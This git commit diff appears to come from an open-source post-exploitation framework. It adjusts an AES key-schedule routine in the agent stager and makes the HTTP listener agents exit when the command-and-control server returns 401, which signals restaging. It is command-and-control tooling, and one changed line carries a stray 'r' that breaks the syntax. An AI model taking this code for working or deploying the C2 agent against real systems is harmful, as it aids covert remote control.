Fixed renegotation loop in stager

2017-10-24 02:45:41 -04:00 · 2017-10-24 02:45:41 -04:00 · 4106db3279
parent dc0f43ee5d
commit 4106db3279
4 changed files with 22 additions and 12 deletions
--- a/data/agent/stagers/http.py
+++ b/data/agent/stagers/http.py
@ -18,6 +18,8 @@ import socket
 import subprocess
 from binascii import hexlify

+
+    
 LANGUAGE = {
    'NONE' : 0,
    'POWERSHELL' : 1,
@ -335,10 +337,10 @@ class AES(object):

            tt = tk[KC - 1]
            tk[0] ^= ((self.S[(tt >> 16) & 0xFF] << 24) ^
-                      (self.S[(tt >>  8) & 0xFF] << 16) ^
-                      (self.S[ tt        & 0xFF] <<  8) ^
-                       self.S[(tt >> 24) & 0xFF]        ^
-                      (self.rcon[rconpointer] << 24))
+                    (self.S[(tt >>  8) & 0xFF] << 16) ^
+                    (self.S[ tt        & 0xFF] <<  8) ^
+                    self.S[(tt >> 24) & 0xFF]        ^
+                    (self.rcon[rconpointer] << 24))
            rconpointer += 1

            if KC != 8:
@ -352,9 +354,9 @@ class AES(object):
                tt = tk[KC // 2 - 1]

                tk[KC // 2] ^= (self.S[ tt        & 0xFF]        ^
-                               (self.S[(tt >>  8) & 0xFF] <<  8) ^
-                               (self.S[(tt >> 16) & 0xFF] << 16) ^
-                               (self.S[(tt >> 24) & 0xFF] << 24))
+                            (self.S[(tt >>  8) & 0xFF] <<  8) ^
+                            (self.S[(tt >> 16) & 0xFF] << 16) ^
+                            (self.S[(tt >> 24) & 0xFF] << 24))

                for i in xrange(KC // 2 + 1, KC):
                    tk[i] ^= tk[i - 1]
@ -372,9 +374,9 @@ class AES(object):
            for j in xrange(0, 4):
                tt = self._Kd[r][j]
                self._Kd[r][j] = (self.U1[(tt >> 24) & 0xFF] ^
-                                  self.U2[(tt >> 16) & 0xFF] ^
-                                  self.U3[(tt >>  8) & 0xFF] ^
-                                  self.U4[ tt        & 0xFF])
+                                self.U2[(tt >> 16) & 0xFF] ^
+                                self.U3[(tt >>  8) & 0xFF] ^
+                                self.U4[ tt        & 0xFF])

    def encrypt(self, plaintext):
        'Encrypt a block of plain text using the AES block cipher.'
--- a/lib/listeners/http.py
+++ b/lib/listeners/http.py
@ -762,6 +762,10 @@ def send_message(packets=None):
    except urllib2.HTTPError as HTTPError:
        # if the server is reached, but returns an erro (like 404)
        missedCheckins = missedCheckins + 1
+        #if signaled for restaging, exit.
+        if HTTPError.code == 401:
+            sys.exit(0)
+        
        return (HTTPError.code, '')

    except urllib2.URLError as URLerror:
--- a/lib/listeners/http_foreign.py
+++ b/lib/listeners/http_foreign.py
@ -502,7 +502,9 @@ def send_message(packets=None):
    except urllib2.HTTPError as HTTPError:
        # if the server is reached, but returns an erro (like 404)
        missedCheckins = missedCheckins + 1
-        return (HTTPError.code, '')
+        r#if signaled for restaging, exit.
+        if HTTPError.code == 401:
+            sys.exit(0)

    except urllib2.URLError as URLerror:
        # if the server cannot be reached
--- a/lib/listeners/http_hop.py
+++ b/lib/listeners/http_hop.py
@ -470,7 +470,9 @@ def send_message(packets=None):
    except urllib2.HTTPError as HTTPError:
        # if the server is reached, but returns an erro (like 404)
        missedCheckins = missedCheckins + 1
-        return (HTTPError.code, '')
+        #if signaled for restaging, exit.
+        if HTTPError.code == 401:
+            sys.exit(0)

    except urllib2.URLError as URLerror:
        # if the server cannot be reached